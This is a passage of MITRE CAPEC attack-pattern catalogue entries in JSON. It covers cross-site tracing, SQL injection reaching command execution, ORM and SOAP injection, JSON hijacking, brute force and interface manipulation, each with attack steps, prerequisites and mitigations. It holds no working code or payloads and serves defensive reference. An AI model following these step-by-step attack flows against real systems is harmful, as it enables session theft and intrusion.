vulnerabilities to force the victim into issuing an HTTP Trace request."},{"Step":"3","Phase":"Exploit","Description":"[Create a malicious script that pings the web server with HTTP TRACE request] The adversary creates a malicious script that will induce the victim\'s browser to issue an HTTP TRACE request to the destination system\'s web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.","Technique":"The adversary\'s malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim\'s session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response."},{"Step":"4","Phase":"Exploit","Description":"[Execute malicious HTTP Trace launching script] The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script"},{"Step":"5","Phase":"Exploit","Description":"[Intercept HTTP TRACE response] The adversary\'s script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary."}]},"Prerequisites":{"Prerequisite":["HTTP TRACE is enabled on the web server","The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy","Scripting is enabled in the client\'s browser","HTTP is used as the communication protocol between the server and the client"]},"Skills_Required":{"Skill":["Understanding of the HTTP protocol and an ability to craft a malicious script",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Administrators should disable support for HTTP TRACE at the destination\'s web server. Vendors should disable TRACE by default.","Patch web browser against known security origin policy bypass exploits."]},"Example_Instances":{"Example":{"p":["An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim\'s authentication cookie. An adversary realizes that since httpOnly attribute is set on the user\'s cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim\'s IE browser to issue an HTTP TRACE to the target system\'s server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim\'s session cookie to impersonate the victim in the target system.","In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim\'s browser (if they can trick the victim\'s into visiting their malicious website or clicking on the link that they supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary\'s malicious script cannot directly issue an HTTP TRACE request to the destination system\'s web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"693"},{"CWE_ID":"648"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Site Tracing"}},"References":{"Reference":{"External_Reference_ID":"REF-3"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings"}]}},"108":{"ID":"108","Name":"Command Line Execution through SQL Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probe for SQL Injection vulnerability] The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query."},{"Step":"2","Phase":"Exploit","Description":"[Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive] The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive."},{"Step":"3","Phase":"Exploit","Description":"[Inject malicious data in the database] Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument"},{"Step":"4","Phase":"Exploit","Description":"[Trigger command line execution with injected arguments] The attacker causes execution of command line functionality which leverages previously injected database content as arguments."}]},"Prerequisites":{"Prerequisite":["The application does not properly validate data before storing in the database","Backend application implicitly trusts the data stored in the database","Malicious data is used on the backend as a command line argument"]},"Skills_Required":{"Skill":["The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Disable MSSQL xp_cmdshell directive on the database","Properly validate the data (syntactically and semantically) before writing it to the database.","Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument)."]},"Example_Instances":{"Example":{"p":["SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).","Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6799"]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"78"},{"CWE_ID":"114"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}}},"109":{"ID":"109","Name":"Object Relational Mapping Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Persistence Framework Used] An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.","Technique":"An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there."},{"Step":"2","Phase":"Explore","Description":"[Probe for ORM Injection vulnerabilities] The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content."},{"Step":"3","Phase":"Exploit","Description":"[Perform SQL Injection through the generated data access layer] An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.","Technique":"An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application."}]},"Prerequisites":{"Prerequisite":["An application uses data access layer generated by an ORM tool or framework","An application uses user supplied data in queries executed against the database","The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework"]},"Skills_Required":{"Skill":["Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework","Ensure to keep up to date with security relevant updates to the persistence framework used within your application."]},"Example_Instances":{"Example":"When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"89"},{"CWE_ID":"564"}]},"References":{"Reference":{"External_Reference_ID":"REF-4","Section":"Testing for ORM Injection (OWASP-DV-007)"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"110":{"ID":"110","Name":"SQL Injection through SOAP Parameter Tampering","Abstraction":"Detailed","Status":"Draft","Description":"An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"66"},{"Nature":"CanPrecede","CAPEC_ID":"108"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Detect Incorrect SOAP Parameter Handling] The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.","Technique":"The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior."},{"Step":"2","Phase":"Experiment","Description":"[Probe for SQL Injection vulnerability] The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query."},{"Step":"3","Phase":"Exploit","Description":"[Inject SQL via SOAP Parameters] The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.","Technique":"An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider."}]},"Prerequisites":{"Prerequisite":["SOAP messages are used as a communication mechanism in the system","SOAP parameters are not properly validated at the service provider","The service provider does not properly utilize parameter binding when building SQL queries"]},"Skills_Required":{"Skill":["If the attacker is able to gain good understanding of the system\'s database schema",{"Level":"Medium"},"If the attacker has to perform Blind SQL Injection",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Properly validate and sanitize/reject user input at the service provider.","Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers\' supplied data from controlling the structure of the executed query.","At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly."]},"Example_Instances":{"Example":"An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system\'s database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system\'s database, perhaps by exploiting another weakness that results in information disclosure."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Skills_Required"}]}},"111":{"ID":"111","Name":"JSON Hijacking (aka JavaScript Hijacking)","Abstraction":"Standard","Status":"Draft","Description":"An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser\'s Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website. An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers\' server. There is nothing in the browser\'s security model to prevent the attackers\' malicious JavaScript code (originating from attacker\'s domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system\'s domain), read its contents and transmit to the attackers\' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Understand How to Request JSON Responses from the Target System] An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.","Technique":"An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers\' ability to craft the exploit."},{"Step":"2","Phase":"Experiment","Description":["[Craft a malicious website]",{"p":["The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:","This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain."],"div":{"style":"margin-left:10px;","ul":{"li":["1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).","2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim\'s browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker."]}}}]},{"Step":"3","Phase":"Exploit","Description":"[Launch JSON hijack] An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim\'s browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim\'s session cookie if the victim is logged in.","Technique":"An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers\' malicious code executing in the victim\'s browser."}]},"Prerequisites":{"Prerequisite":["JSON is used as a transport mechanism between the client and the server","The target server cannot differentiate real requests from forged requests","The JSON object returned from the server can be accessed by the attackers\' malicious code via a script tag"]},"Skills_Required":{"Skill":["Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim\'s session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.","On the client side, the system\'s design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).","Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.","Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario."]},"Example_Instances":{"Example":{"p":["Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim\'s address book. An attacker could send an e-mail to the victim\'s Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers\' malicious site. If the victim clicked on the link, a request (containing the victim\'s authenticated session cookie) would be sent to the Gmail servers to fetch the victim\'s address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.","When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers\' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser\'s same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers\' own constructor in order to gain access to the JSON object\'s contents. These contents could then be transferred to the site controlled by the attacker."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"352"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Attack_Patterns"}]}},"112":{"ID":"112","Name":"Brute Force","Abstraction":"Meta","Status":"Draft","Description":"In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset. Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers\' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine secret testing procedure] Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.","Technique":"Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers\' position is significantly degraded."},{"Step":"2","Phase":"Explore","Description":"[Reduce search space] Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.","Technique":["If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)","If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.","If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.","Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret."]},{"Step":"3","Phase":"Explore","Description":"[Expand victory conditions] It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value."},{"Step":"4","Phase":"Exploit","Description":"[Gather information so attack can be performed independently.] If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords)."}]},"Prerequisites":{"Prerequisite":"The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct."},"Skills_Required":{"Skill":["The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures."},"Indicators":{"Indicator":["Repeated submissions of incorrect secret values may indicate a brute force attack. For example, repeated bad passwords when accessing user accounts or repeated queries to databases using non-existent keys.","Attempts to download files protected by secrets (usually using encryption) may be a precursor to an offline attack to break the file\'s encryption and read its contents. This is especially significant if the file itself contains other secret values, such as password files.","If the attacker is able to perform the checking offline then there will likely be no indication that an attack is ongoing."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.","Use a secret space that is well known and with no known patterns that may reduce functional size.","Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"330"},{"CWE_ID":"326"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"11","Entry_Name":"Brute Force"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Brute force attack"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Mitigations, Taxonomy_Mappings"}]}},"113":{"ID":"113","Name":"Interface Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges."},"Resources_Required":{"Resource":"The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language."},"Example_Instances":{"Example":["An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.","API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.","SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1192"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, @Status, Description, Example_Instances, Prerequisites, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses, Resources_Required"}],"Previous_Entry_Name":["API Abuse/Misuse",{"Date":"2015-12-07"},"API Manipulation",{"Date":"2020-12-17"}]}},"114":{"ID":"114","Name":"Authentication Abuse","Abstraction":"Meta","Status":"Draft","Description":"An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme\'s implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target\'s authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \\"Exploitation of Session Variables, Resource IDs and other Trusted 